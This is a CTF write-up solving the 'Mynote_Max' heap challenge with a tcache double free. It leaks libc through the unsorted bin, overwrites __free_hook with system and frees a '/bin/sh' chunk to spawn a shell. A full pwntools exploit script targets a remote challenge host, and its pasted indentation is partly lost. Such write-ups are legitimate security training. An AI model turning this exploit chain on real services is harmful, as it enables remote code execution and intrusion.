[tcache double free]
1. ida分析
2. 思路
- 先填满tcache,使用unsorted bin泄漏libc的地址(这里只能申请9个chunk,可以将chunk 0 释放7次,填满tcache)
- 利用double free修改free_hook为system
- 释放chunk内容是 /bin/sh\x00 的chunk, free_hook 会将chunk中的内容作为参数传入
3. exp
from pwn import *
from LibcSearcher import *
elf = ELF('./Mynote_Max')
p = remote('47.99.38.177', 10001)
local_libc_64 = ELF('./libc-2.27.so')


# Thin wrappers over the pwntools tube so the rest of the script reads like a
# menu transcript.  Names are kept because the helpers below call them.
def s(data):
    return p.send(data)


def sa(delim, data):
    return p.sendafter(delim, data)


def sl(data):
    return p.sendline(data)


def sla(delim, data):
    return p.sendlineafter(delim, data)


def r(numb=4096):
    return p.recv(numb)


def ru(delims):
    return p.recvuntil(delims)


def uu64(data):
    # Pad a short (e.g. 6-byte) pointer leak to 8 bytes before unpacking.
    return u64(data.ljust(8, '\x00'))


def leak(name, addr):
    return log.success('{} ===> {:#x}'.format(name, addr))
def debug():
    """Attach gdb to the live tube and block until the operator resumes."""
    gdb.attach(p)
    pause()
def add(size, cont):
    """Menu option 1: request a chunk of `size` bytes holding `cont`.

    Each answer is sent after the program's ':' prompt.  `cont` is passed
    through unchanged, so the caller supplies the exact bytes to store.
    """
    for answer in ('1', str(size), cont):
        sla(':', answer)
def show(index):
    """Menu option 2: ask the program to display chunk `index`."""
    for answer in ('2', str(index)):
        sla(':', answer)
def free(index):
    """Menu option 3: release chunk `index` (the program's delete action)."""
    for answer in ('3', str(index)):
        sla(':', answer)
# Free indices 0..numb-1; as pasted the two free() calls follow the loop with
# no indentation, so whether both are inside it cannot be confirmed here.
# Not called anywhere in the visible script.
def remove_tcache(numb):
for i in range(numb):
free(i)
free(i)
# Allocate numb chunks of 0x100 bytes.  Indentation was lost in this paste,
# so how many of the add() calls that follow belong to this loop body is not
# recoverable from the text.  Not called anywhere in the visible script.
def fill_tcache(numb):
for i in range(numb):
add(0x100,'/bin/sh\x00')
# NOTE(review): indentation was lost in this paste, so the extent of the
# `for` loop below (which lines are inside it) cannot be confirmed from the text.
# Three more 0x90-byte chunks; the last holds the "/bin/sh" string the write-up
# plans to free later.
add(0x90,'0')
add(0x90,'1')
add(0x90,'/bin/sh\x00')
# The same index is freed repeatedly.  This only succeeds on an allocator with
# no double-free detection in tcache; glibc 2.29+ (and patched 2.27 builds)
# add a key check that aborts here, which is the mitigation defenders rely on.
for i in range(7):
free(0)
free(1)
# Read back chunk 1 after freeing it; the program prints 'Content: ' then the data.
show(1)
ru('Content: ')
# The leaked pointer is treated as main_arena+96, with main_arena assumed at
# __malloc_hook+0x10 (the libc-2.27.so layout loaded above) -- TODO confirm
# against the actual libc if the offset print below does not match.
libc_base =uu64(r(6)) - 96 -local_libc_64.sym['__malloc_hook'] -0x10
print("offset-------"+hex(96+local_libc_64.sym['__malloc_hook']+0x10))
leak("libc_base",libc_base)
system = libc_base+local_libc_64.sym['system']
free_hook = libc_base+local_libc_64.sym['__free_hook']
leak("free_hook",free_hook)
leak("system",system)
# Three 0x90 allocations: the first two write p64(free_hook), the third
# writes p64(system).  Per the write-up this relies on the double free to
# redirect the free list so that the third chunk lands on __free_hook.
# (__free_hook no longer exists in glibc 2.34+, which removes this target.)
add(0x90,p64(free_hook))
add(0x90,p64(free_hook))
add(0x90,p64(system))
# Freeing a chunk now calls the hook with the chunk contents as argument.
free(2)
p.interactive()